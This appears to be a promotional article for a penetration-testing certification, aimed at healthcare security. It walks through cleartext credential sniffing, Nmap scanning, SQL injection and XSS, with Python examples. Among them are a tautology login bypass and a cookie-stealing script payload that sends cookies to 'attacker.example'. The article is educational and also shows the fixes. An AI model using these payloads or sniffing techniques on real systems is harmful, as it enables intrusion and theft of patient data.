Advanced penetration testing means assessing applications, systems, and networks, known or unknown to the tester, that are already fully patched and hardened and that sit behind network- and host-based intrusion detection and prevention systems. With the recent pandemic, the healthcare industry faces a wide array of challenges, including those posed by cybercriminals. The World Health Organization (WHO), the Department of Health and Human Services (HHS), and a large coronavirus testing facility in the Czech Republic were all successfully attacked in recent weeks. Ever ruthless, cybercriminals view the current grave situation as a golden opportunity to target the healthcare industry.
What does advanced penetration testing involve?
A penetration test entails many activities. Since healthcare systems are hubs of sensitive data, we will walk through three techniques a tester could use to exploit weaknesses in such a system: passive packet sniffing, port scanning with follow-on access, and SQL injection, with cross-site scripting as a related web-application attack.
First, we will use the packet analyzer Wireshark. Wireshark captures and decodes every frame that reaches the interface it listens on. On a modern switched network that means only our own traffic and broadcasts, unless we sit on a mirror (SPAN) port or a tap, or redirect traffic to ourselves with a technique such as ARP spoofing. Once we can see the traffic, anything sent in cleartext (HTTP, FTP, Telnet, or SMTP without TLS) can be read straight off the wire, including usernames and passwords, and Wireshark's display filters (for example "http.authorization" or "http.request.method == \"POST\"") make those strings easy to locate and reuse against the system to reach sensitive information such as patient records or payment card details. Traffic protected by TLS reveals only endpoints and metadata, not the credentials or card details inside it.
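The following is an added example, not code from the original article or from Wireshark: it parses raw Ethernet/IPv4/TCP frames the way a sniffer does and pulls cleartext HTTP credentials out of the TCP payload, while a TLS payload on port 443 yields nothing. All three frames are constructed inline; the form field names "username" and "password" and the host "ehr.example" are assumptions about the target application.

```python
import base64
import struct
from urllib.parse import parse_qs

# Added example (not from the original article): parse raw Ethernet/IPv4/TCP
# frames like a sniffer and extract cleartext HTTP credentials from the payload.
# Every frame below is constructed here; the form field names "username" and
# "password" are an assumption about the target application.

ETH_LEN = 14          # Ethernet II header length
IP_PROTO_TCP = 6

def build_frame(src_port, dst_port, payload):
    """Build a minimal Ethernet + IPv4 + TCP frame around payload (checksums left zero)."""
    eth = b"\x00" * 12 + b"\x08\x00"                    # dst MAC, src MAC, EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 40 + len(payload), 0, 0, 64, IP_PROTO_TCP, 0,
                     bytes([192, 168, 75, 50]), bytes([192, 168, 75, 14]))
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload

def tcp_payload(frame):
    """Return (dst_port, payload), honouring the IHL and TCP data-offset fields."""
    ihl = (frame[ETH_LEN] & 0x0F) * 4
    if frame[ETH_LEN + 9] != IP_PROTO_TCP:
        return None, b""
    tcp_start = ETH_LEN + ihl
    dst_port = struct.unpack("!H", frame[tcp_start + 2:tcp_start + 4])[0]
    data_offset = (frame[tcp_start + 12] >> 4) * 4
    return dst_port, frame[tcp_start + data_offset:]

def extract_credentials(frames):
    """Credentials visible in cleartext HTTP. TLS payloads are opaque and yield nothing."""
    found = []
    for frame in frames:
        dst_port, payload = tcp_payload(frame)
        if not payload.startswith((b"GET ", b"POST ")):
            continue                                     # not cleartext HTTP (e.g. TLS on 443)
        head, _, body = payload.partition(b"\r\n\r\n")
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b": ")
            if name.lower() == b"authorization" and value.startswith(b"Basic "):
                user, _, pw = base64.b64decode(value[6:]).decode().partition(":")
                found.append({"port": dst_port, "source": "basic-auth",
                              "user": user, "password": pw})
        if body:
            form = parse_qs(body.decode(errors="replace"))
            if "username" in form and "password" in form:
                found.append({"port": dst_port, "source": "form",
                              "user": form["username"][0], "password": form["password"][0]})
    return found

# Constructed capture: one Basic-auth GET, one form login POST, one TLS ClientHello fragment.
SAMPLE_FRAMES = [
    build_frame(51000, 80, b"GET /ehr/patients HTTP/1.1\r\nHost: ehr.example\r\n"
                           b"Authorization: Basic " + base64.b64encode(b"nurse1:Winter2020!") + b"\r\n\r\n"),
    build_frame(51001, 80, b"POST /login HTTP/1.1\r\nHost: ehr.example\r\n"
                           b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 33\r\n\r\n"
                           b"username=admin&password=s3cret%21"),
    build_frame(51002, 443, bytes.fromhex("160301003a010000360303") + b"\x00" * 16),
]

if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_FRAMES):
        print(cred)
```

The parser reads the IHL and TCP data-offset fields rather than assuming 20-byte headers, which is what a sniffer must do when options are present. The third frame is the start of a TLS handshake: it is captured just like the others, but nothing usable comes out of it, which is the practical limit of sniffing against a correctly configured application.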
The second step is to scan the target for open ports and services. Metasploit can drive Nmap directly with the db_nmap command, which runs the scan and stores the results in the Metasploit database. Below are sample results we might obtain:
- [*] Nmap: Nmap scan report for 192.168.75.14
- [*] Nmap: Host is up (0.00059s latency).
- [*] Nmap: PORT STATE SERVICE
- [*] Nmap: 22/tcp open ssh
- [*] Nmap: 80/tcp open http
From the above results we can deduce that two TCP ports, 22 (SSH) and 80 (HTTP), are open. An open port is an entry point, not a vulnerability in itself: port 22 only gets us in if we hold valid credentials (captured with Wireshark, reused from another breach, or guessed) or the SSH service runs a version with a known flaw, which a service and version scan (nmap -sV) would reveal. Once we do have a foothold, SSH port forwarding lets us tunnel through that host to internal servers that are not reachable from our own position, such as the database behind the web application, and that is the route by which patient data would be extracted.
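As an added example (not code from the original article, Nmap, or Metasploit), the block below parses the XML that "nmap -sV -oX scan.xml 192.168.75.14" writes and turns it into a list of open services with the product and version Nmap detected, which is the information actually needed to decide whether a service is worth attacking. The XML is constructed by hand to match the scan shown above, with one closed port added and assumed product names.

```python
import xml.etree.ElementTree as ET

# Added example (not from the original article): parse Nmap's -oX output into
# open services with detected versions. The XML below is constructed by hand to
# mirror the scan in the text; the product/version strings are assumptions.

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.75.14">
  <host>
    <status state="up"/>
    <address addr="192.168.75.14" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.6"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
        <service name="https"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def open_services(xml_text):
    """Return one dict per open port: host, port, proto, service, product, version."""
    root = ET.fromstring(xml_text)
    services = []
    for host in root.iter("host"):
        addrs = [a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"]
        addr = addrs[0] if addrs else None
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                          # closed/filtered ports are not entry points
            svc = port.find("service")
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return services

def finding_line(service):
    """One report line per service; flags services where no version was detected."""
    where = "%s:%d/%s %s" % (service["host"], service["port"], service["proto"], service["service"])
    if service["product"] and service["version"]:
        return "%s (%s %s): check vendor advisories for this version" % (
            where, service["product"], service["version"])
    return "%s: no version detected, rerun with -sV before drawing conclusions" % where

if __name__ == "__main__":
    for svc in open_services(SAMPLE_NMAP_XML):
        print(finding_line(svc))
```

Feeding the version strings into a vulnerability database or vendor advisories is the step that turns "port 22 is open" into a real finding; the parser deliberately leaves that judgement to the tester rather than asserting that any version is exploitable.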
The third way in which we can penetrate the system is via a SQL injection attack. SQL injection manipulates database queries by inserting malicious strings into input that the application splices directly into its SQL text. In our case, the healthcare system uses a web application that talks to a database server. For the injection we submit a tautology such as ' OR '1'='1 as the username: the WHERE clause of the login query then evaluates to true for every row, and the application lets us log in without valid credentials.
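The login check described above, as an added example that is not code from the original article: the query built by string concatenation sits beside the parameterised version, and the same tautology payload is run against both. The users table, the account "drsmith" and its password are constructed here; the password hash is plain SHA-256 only to keep the block short, where a real application would use a salted, slow hash such as scrypt or bcrypt.

```python
import hashlib
import sqlite3

# Added example (not from the original article): a login query written by string
# concatenation beside the parameterised form, both run against the same
# tautology payload. Table, account and password are constructed here.

def password_hash(password):
    # SHA-256 keeps the example short; production code needs a salted slow hash.
    return hashlib.sha256(password.encode()).hexdigest()

def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("drsmith", password_hash("Correct-Horse-9")))
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Splices the username straight into the SQL text: injectable."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
             % (username, password_hash(password)))
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Bound parameters: the username is passed as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash(password)),
    ).fetchone()
    return row[0] if row else None

# Tautology payload: closes the string literal, ORs in an always-true condition,
# and comments out the password check that follows it in the query.
TAUTOLOGY = "' OR '1'='1'--"

if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable login with tautology:", login_vulnerable(conn, TAUTOLOGY, "wrong"))
    print("safe login with tautology:      ", login_safe(conn, TAUTOLOGY, "wrong"))
```

Two details matter in practice. The payload goes into the username field because the password is hashed before it reaches the query, so nothing injected there survives; and the resulting query returns the first matching row, which on a real system is often an administrative account. Parameterised queries are the fix; escaping quotes by hand is not, because it has to be right in every code path.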
Cross-site scripting (XSS) is a further web-application weakness, and it does not depend on whether the application uses SSL/TLS: TLS protects data in transit, whereas XSS arises when the application places user-supplied input into a page without encoding it. XSS lets us run script of our choosing in other users' browsers, where it can steal cookies, session tokens, and personal information. The same script can also modify the contents of the page, for example by adding fake links that redirect users to malicious websites.
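As an added example (not code from the original article), the block below shows a search page that reflects the query back into its HTML with and without output encoding, the cookie-stealing payload from the text, and the Set-Cookie header that keeps a session token out of reach of injected script. The template, payload and the host "attacker.example" are constructed here.

```python
import html
from http.cookies import SimpleCookie

# Added example (not from the original article): reflected XSS in a page that
# echoes user input, the encoded fix, and a session cookie that script cannot
# read. Template, payload and hostnames are constructed here.

TEMPLATE = "<p>Results for: {query}</p>"

def render_vulnerable(query):
    """User input placed into the page verbatim: reflected XSS."""
    return TEMPLATE.format(query=query)

def render_safe(query):
    """HTML-encode the input so the browser treats it as text, not markup."""
    return TEMPLATE.format(query=html.escape(query, quote=True))

# Attacker payload: ship the victim's cookies to a host the attacker controls.
PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"

def payload_executes(page):
    """True if the page contains an unencoded script tag, i.e. the browser would run it."""
    return "<script>" in page

def session_cookie_header(token, http_only=True):
    """Set-Cookie line for the session. HttpOnly hides the value from document.cookie."""
    c = SimpleCookie()
    c["session"] = token
    c["session"]["secure"] = True        # never sent over plain HTTP
    c["session"]["httponly"] = http_only
    c["session"]["samesite"] = "Lax"
    return c.output(header="Set-Cookie:")

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_cookie_header("9f1c2d"))
```

Output encoding at the point where data meets HTML is the fix for XSS itself. HttpOnly is defence in depth: it stops the payload above from reading the session cookie, but injected script can still issue requests with the victim's session and rewrite the page, so it does not make XSS harmless.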
How long does a penetration test take?
The length of a penetration test depends largely on the type of testing, the kinds of devices and networks tested, and the number of systems in scope.
As the examples above show, and with the increased demand for cyber security in healthcare, a penetration tester needs real-world knowledge of advanced penetration testing techniques to give their client the best results. These techniques need to mimic as closely as possible what real attackers do, so that the organization can take steps to prevent these kinds of attacks.
According to EC-Council President Jay Bavisi, “With the recent Equifax incident and the multitude of other data security breaches in recent years, the need for skilled, vetted penetration testers has increased for the world’s organizations. The LPT (Master) exam simulates a real-world environment and requires candidates to correctly identify any security threats and weaknesses against social, physical, network, and application attacks.”
How much do penetration testers get paid?
What is the best penetration testing certification?
Obtaining the Licensed Penetration Tester (Master) credential (L|PT (Master)) proves that you have real-world know-how of advanced penetration testing. One of the main goals of the L|PT (Master) program is not only to test your knowledge of penetration testing but to put you under the pressure of being observed while you complete the challenges. The L|PT (Master) exam is built on EC-Council's Advanced Penetration Testing Cyber Range (ECCAPT), which consists of the following:
- 100% hands-on
- 180 machines
- 250 GB of RAM
- Over 4TB of storage
- 5 to 8 subnets in every range
- Over 15 Windows and Linux flavors